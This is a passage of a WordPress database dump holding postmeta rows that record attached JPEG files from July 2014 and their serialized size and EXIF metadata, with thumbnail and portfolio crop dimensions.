h\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:15:\"091-450x352.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:352;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:15:\"091-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(170,530,'_wp_attached_file','2014/07/101.jpg'),(171,530,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:653;s:6:\"height\";i:576;s:4:\"file\";s:15:\"2014/07/101.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"101-300x265.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"101-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"101-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:15:\"101-653x500.jpg\";s:5:\"width\";i:653;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:15:\"101-653x380.jpg\";s:5:\"width\";i:653;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:15:\"101-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:15:\"101-450x397.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:397;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:15:\"101-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(172,531,'_wp_attached_file','2014/07/111.jpg'),(173,531,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:667;s:6:\"height\";i:458;s:4:\"file\";s:15:\"2014/07/111.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"111-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"111-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"111-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:15:\"111-667x380.jpg\";s:5:\"width\";i:667;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:15:\"111-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:15:\"111-450x309.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:309;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:15:\"111-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(174,532,'_wp_attached_file','2014/07/121.jpg'),(175,532,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:1210;s:4:\"file\";s:15:\"2014/07/121.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"121-300x227.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:227;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"121-1024x774.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:774;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"121-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"121-768x581.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:581;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:17:\"121-1536x1162.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1162;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"121-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:16:\"121-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:15:\"121-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:15:\"121-880x666.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:666;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:15:\"121-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:15:\"121-450x340.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:340;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:15:\"121-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176,533,'_wp_attached_file','2014/07/131.jpg'),(177,533,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:639;s:6:\"height\";i:405;s:4:\"file\";s:15:\"2014/07/131.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"131-300x190.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"131-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"131-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:15:\"131-639x380.jpg\";s:5:\"width\";i:639;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:15:\"131-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:15:\"131-450x285.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:15:\"131-450x405.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:405;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(178,534,'_wp_attached_file','2014/07/141.jpg'),(179,534,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:900;s:6:\"height\";i:642;s:4:\"file\";s:15:\"2014/07/141.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"141-300x214.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"141-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"141-768x548.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:548;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"141-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:15:\"141-900x500.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:15:\"141-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:15:\"141-880x628.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:628;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:15:\"141-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:15:\"141-450x321.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:321;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:15:\"141-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(180,535,'_wp_attached_file','2014/07/151.jpg'),(181,535,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:900;s:6:\"height\";i:684;s:4:\"file\";s:15:\"2014/07/151.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"151-300x228.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:228;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"151-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"151-768x584.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:584;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"151-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:15:\"151-900x500.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:15:\"151-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:15:\"151-880x669.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:669;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:15:\"151-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:15:\"151-450x342.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:342;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:15:\"151-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(182,536,'_wp_attached_file','2014/07/i11.jpg'),(183,536,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:799;s:4:\"file\";s:15:\"2014/07/i11.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"i11-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"i11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"i11-768x614.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:614;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"i11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:16:\"i11-1000x500.jpg\";s:5:\"width\";i:1000;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:15:\"i11-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:15:\"i11-880x703.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:703;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:15:\"i11-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:15:\"i11-450x360.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:15:\"i11-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(184,537,'_wp_attached_file','2014/07/i21.jpg'),(185,537,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:610;s:4:\"file\";s:15:\"2014/07/i21.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"i21-300x183.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:183;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"i21-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"i21-768x468.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:468;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"i21-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:16:\"i21-1000x500.jpg\";s:5:\"width\";i:1000;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:15:\"i21-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:15:\"i21-880x537.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:537;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:15:\"i21-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:15:\"i21-450x275.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:275;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:15:\"i21-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(186,538,'_wp_attached_file','2014/07/i31.jpg'),(187,538,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:999;s:6:\"height\";i:609;s:4:\"file\";s:15:\"2014/07/i31.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"i31-300x183.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:183;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"i31-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"i31-768x468.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:468;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"i31-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:15:\"i31-999x500.jpg\";s:5:\"width\";i:999;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:15:\"i31-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:15:\"i31-880x536.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:15:\"i31-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:15:\"i31-450x274.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:15:\"i31-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(188,539,'_wp_attached_file','2014/07/i41.jpg'),(189,539,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:638;s:4:\"file\";s:15:\"2014/07/i41.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"i41-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"i41-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"i41-768x490.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:490;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"i41-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:16:\"i41-1000x500.jpg\";s:5:\"width\";i:1000;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:15:\"i41-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:15:\"i41-880x561.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:561;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:15:\"i41-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:15:\"i41-450x287.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:287;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:15:\"i41-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(190,540,'_wp_attached_file','2014/07/i51.jpg'),(191,540,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:549;s:4:\"file\";s:15:\"2014/07/i51.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"i51-300x165.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:165;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"i51-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"i51-768x422.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:422;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"i51-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:16:\"i51-1000x500.jpg\";s:5:\"width\";i:1000;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:15:\"i51-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:15:\"i51-880x483.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:483;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:15:\"i51-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:15:\"i51-450x247.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:247;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:15:\"i51-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(192,541,'_wp_attached_file','2014/07/i61.jpg'),(193,541,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:618;s:4:\"file\";s:15:\"2014/07/i61.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"i61-300x185.jpg\";s:5:\"w